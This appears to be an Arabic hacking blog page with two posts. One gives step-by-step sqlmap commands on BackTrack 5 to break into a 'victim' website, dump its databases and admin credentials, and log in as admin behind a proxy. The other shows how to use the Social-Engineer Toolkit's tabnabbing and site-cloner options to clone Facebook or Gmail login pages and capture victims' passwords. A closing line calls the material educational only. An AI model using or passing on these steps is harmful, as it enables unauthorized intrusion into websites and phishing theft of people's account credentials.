تابعنا عبرFacebook

التبادل الإعلاني

‏إظهار الرسائل ذات التسميات الباك تراك. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات الباك تراك. إظهار كافة الرسائل

الأحد، 30 يونيو 2013

إختراق المواقع بإستخدام الباك تراك 5 (sqlmap)

السلام عليكم ورحمة الله وبركاته

اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !


2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)


3. الآن اكتب هذا الأمر  واضغط على enter. 


python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !




حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.


python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
 

 

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ



8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns 




الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!



الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

الأربعاء، 26 يونيو 2013

كيفية إختراق الفيس بوك باستخدام بالباك تراك 5 (backtrak 5)



السلام عليكم زوار ومتابعي نقطة التعلم اليوم سوف أشرح لكم "كيفية إختراق الفيس بوك باستخدام بالباك تراك 5 (backtrak 5) " لذلك ما عليك سوى اتباع خطوات بسيطة.



الآن فتح أدوات الهندسة الاجتماعية (SET).

فقط اضغط على Enter و SET ستفتح، الآن ما عليك سوى اختيار الخيار 1 (1 Social-Engineering Attacks) واضغط بعد ذلك عدد 2 (فقط من النوع 2 كما هو موضح)



الآن إختر 4“Tabnabbing Attack Method” ثم ENTER



ثم حدد الخيار 2 “Site Cloner” وإضغط ENTER



الآن هنا تحتاج إلى إضافة عنوان URL من الفيسبوك (إذا كنت تريد أن تختراق جوجل أدخل فقط عنوان URL الخاص ب Gmail)


الآن بمجرد الضغط على enter ثم الهجوم !



إفتح ifconfig ثم ENTER



الآن مجرد انسخ عنوان IP وافتحه في المتصفح.



الآن أكتب البريد الإلكتروني وكلمة المرور لمعرفة ما إذا كان يعمل أو لا.



الآن نلاحظ التبليغ على الباك تراك (البريد الإلكتروني وكلمة المرور)!



هذا البرنامج التعليمي هو غرض تعليمي في نقطة التعلم فقط وأنا لست مسؤول عن كل من يستعمله إستعمالا خطيرا !
وبالنسبة لأصحاب السرعة الفائقة (نسخ/لصق) فجميع الحقوق محفوظة لنقطة التعلم
.